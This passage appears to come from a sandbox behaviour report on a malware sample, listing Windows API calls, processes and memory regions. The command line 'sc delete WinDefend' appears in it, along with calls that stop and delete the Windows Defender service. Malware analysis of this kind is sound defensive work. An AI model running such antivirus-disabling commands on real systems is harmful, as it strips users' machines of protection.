lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x4df5f8 [0140.860] ControlService (in: hService=0x4df5f8, dwControl=0x1, lpServiceStatus=0x10fdd8 | out: lpServiceStatus=0x10fdd8*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x85, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0140.965] _itow (in: _Dest=0x20, _Radix=1113284 | out: _Dest=0x20) returned="20" [0140.965] _itow (in: _Dest=0x4, _Radix=1113332 | out: _Dest=0x4) returned="4" [0140.965] _itow (in: _Dest=0x0, _Radix=1113452 | out: _Dest=0x0) returned="0" [0140.965] _itow (in: _Dest=0x0, _Radix=1113428 | out: _Dest=0x0) returned="0" [0140.965] _itow (in: _Dest=0x0, _Radix=1113356 | out: _Dest=0x0) returned="0" [0140.965] _itow (in: _Dest=0x0, _Radix=1113308 | out: _Dest=0x0) returned="0" [0140.965] _itow (in: _Dest=0x0, _Radix=1113260 | out: _Dest=0x0) returned="0" [0140.965] _itow (in: _Dest=0x0, _Radix=1113380 | out: _Dest=0x0) returned="0" [0140.966] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x2f, dwLanguageId=0x0, lpBuffer=0x10fc48, nSize=0x2, Arguments=0x10fc58 | out: lpBuffer="㱨N\x01") returned 0x15d [0140.967] GetFileType (hFile=0x7) returned 0x2 [0140.967] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x10fc1c | out: lpMode=0x10fc1c) returned 1 [0140.967] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4e3c68*, nNumberOfCharsToWrite=0x15d, lpNumberOfCharsWritten=0x10fc38, lpReserved=0x0 | out: lpBuffer=0x4e3c68*, lpNumberOfCharsWritten=0x10fc38*=0x15d) returned 1 [0140.968] LocalFree (hMem=0x4e3c68) returned 0x0 [0140.968] LocalFree (hMem=0x0) returned 0x0 [0140.968] CloseServiceHandle (hSCObject=0x4df5f8) returned 1 [0140.968] CloseServiceHandle (hSCObject=0x4df698) returned 1 [0141.063] exit (_Code=0) Thread: id = 155 os_tid = 0xa54 Process: id = "23" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x743ec000" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x600" cmd_line = "sc delete WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3230 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3231 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3232 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3233 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3234 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3235 start_va = 0x80000 end_va = 0x8bfff entry_point = 0x80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 3236 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3237 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 3238 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3239 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3240 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3241 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3242 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3243 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3244 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3245 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3246 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3247 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 3248 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3249 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3250 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3251 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3252 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3253 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3254 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3255 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3256 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3257 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3258 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3259 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3260 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3261 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3262 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3263 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3264 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 3265 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 3266 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3267 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3364 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3365 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3366 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x90000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 153 os_tid = 0x9c8 [0140.853] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefa6c | out: lpSystemTimeAsFileTime=0xefa6c*(dwLowDateTime=0xf366d1e0, dwHighDateTime=0x1d48db2)) [0140.853] GetCurrentProcessId () returned 0x9b8 [0140.853] GetCurrentThreadId () returned 0x9c8 [0140.853] GetTickCount () returned 0x2ed3b [0140.853] QueryPerformanceCounter (in: lpPerformanceCount=0xefa64 | out: lpPerformanceCount=0xefa64*=1820847700000) returned 1 [0140.853] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0140.853] __set_app_type (_Type=0x1) [0140.853] __p__fmode () returned 0x75ab31f4 [0140.853] __p__commode () returned 0x75ab31fc [0140.854] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0140.854] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0140.854] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.954] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.954] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.954] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0140.954] _wcsicmp (_String1="delete", _String2="query") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="start") returned -15 [0140.954] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0140.954] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0140.954] _wcsicmp (_String1="delete", _String2="control") returned 1 [0140.954] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0140.954] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0140.954] _wcsicmp (_String1="delete", _String2="config") returned 1 [0140.954] _wcsicmp (_String1="delete", _String2="description") returned -7 [0140.954] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0140.954] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0140.954] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0140.954] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0140.954] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0140.954] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0140.954] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0140.954] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0140.954] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0140.954] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0140.955] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2bf6a0 [0140.957] OpenServiceW (hSCManager=0x2bf6a0, lpServiceName="WinDefend", dwDesiredAccess=0x10000) returned 0x2bf600 [0140.957] DeleteService (hService=0x2bf600) returned 1 [0140.962] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0xef998, nSize=0x2, Arguments=0xef9a4 | out: lpBuffer="㱸,勤\x0e榳\x08ᰐ\x08") returned 0x1c [0140.963] GetFileType (hFile=0x7) returned 0x2 [0140.963] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xef96c | out: lpMode=0xef96c) returned 1 [0140.963] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2c3c78*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xef988, lpReserved=0x0 | out: lpBuffer=0x2c3c78*, lpNumberOfCharsWritten=0xef988*=0x1c) returned 1 [0140.963] LocalFree (hMem=0x2c3c78) returned 0x0 [0140.963] LocalFree (hMem=0x0) returned 0x0 [0140.964] CloseServiceHandle (hSCObject=0x2bf600) returned 1 [0140.964] CloseServiceHandle (hSCObject=0x2bf6a0) returned 1 [0141.058] exit (_Code=0) Thread: id = 154 os_tid = 0x9c0 Process: id = "24" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x1bb6d000" os_pid = "0xa58" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x36c" cmd_line = "taskeng.exe {B695F367-0160-4949-AEB5-6C2E65CBA0C5} S-1-5-18:NT AUTHORITY\\System:Service:" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3699 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3700 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3701 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3702 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3703 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3704 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3705 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3706 start_va = 0xff2b0000 end_va = 0xff323fff entry_point = 0xff2b0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 3707 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3708 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3709 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3710 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3711 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 3712 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3713 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3714 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3715 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3716 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3717 start_va = 0xc0000 end_va = 0x17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3718 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 3719 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3720 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3721 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3722 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3723 start_va = 0x5a0000 end_va = 0x727fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3724 start_va = 0x730000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3725 start_va = 0x8c0000 end_va = 0xcb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 3726 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3727 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3728 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3729 start_va = 0x7fef9440000 end_va = 0x7fef9449fff entry_point = 0x7fef9440000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3730 start_va = 0x7fefd6b0000 end_va = 0x7fefd71cfff entry_point = 0x7fefd6b0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3731 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3732 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3733 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3734 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3735 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3736 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3737 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3738 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3739 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3740 start_va = 0x430000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3741 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 3742 start_va = 0x4f0000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3743 start_va = 0xce0000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 3744 start_va = 0xd90000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 3745 start_va = 0xe60000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 3746 start_va = 0xee0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 3747 start_va = 0x10d0000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 3748 start_va = 0x1150000 end_va = 0x141efff entry_point = 0x1150000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3749 start_va = 0x7fef8120000 end_va = 0x7fef8128fff entry_point = 0x7fef8120000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 3750 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3751 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3752 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3753 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3754 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3755 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3756 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3757 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3758 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3759 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3760 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3761 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3762 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3763 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 5167 start_va = 0x1440000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 5168 start_va = 0x7fefc040000 end_va = 0x7fefc074fff entry_point = 0x7fefc040000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Thread: id = 177 os_tid = 0xa70 Thread: id = 179 os_tid = 0xb9c Thread: id = 180 os_tid = 0xba4 Thread: id = 181 os_tid = 0xb94 Thread: id = 182 os_tid = 0xba8 Thread: id = 191 os_tid = 0xb48 Thread: id = 192 os_tid = 0x5c8 Thread: id = 193 os_tid = 0x620 Thread: id = 360 os_tid = 0x84c Thread: id = 361 os_tid = 0x848 Process: id = "25" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x6d748000" os_pid = 